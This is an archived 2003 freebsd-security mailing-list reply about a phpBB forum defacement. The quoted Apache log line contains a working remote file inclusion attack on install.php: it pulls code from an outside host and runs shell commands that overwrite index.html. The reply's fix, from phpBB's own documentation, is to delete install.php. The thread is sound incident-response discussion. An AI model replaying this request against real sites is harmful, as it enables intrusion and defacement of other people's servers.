Re: hack ? - urgent - false FreeBSD alarm

From: Kevin D. Kinsey, DaleCo, S.P. (kdk_at_daleco.biz)
Date: 11/07/03

Next message: Marco Trentini: "Re: hack ? - urgent"

Previous message: paris stefas: "Re: hack ? - urgent"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Fri, 07 Nov 2003 13:48:42 -0600
To: Miha Nedok <mike@voyager.unix-systems.net>

Miha Nedok wrote:

>Hi !
>
>It is phpBB related. I found in logs:
>200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET
>/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-
>name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html
>HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
>
>
>
>I just did chmod 000 `find -name 'install.php'` for a workaround.
>
>Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .
>
>
>
>-Miha
>
>
>
>
>
From ~/phpp/docs/Install.html:

_6. Important post-Install tasks for all installation methods_

Once you have succssfully installed phpBB 2.0.0 you *MUST* ensure you
remove install.php, upgrade.php and update_to_FINAL.php files. Leaving
these in place is a _very serious potential security issue_.
Additionally you may delete the db/schemas, docs/ and contrib/
directories if you wish.

_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

Next message: Marco Trentini: "Re: hack ? - urgent"

Previous message: paris stefas: "Re: hack ? - urgent"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]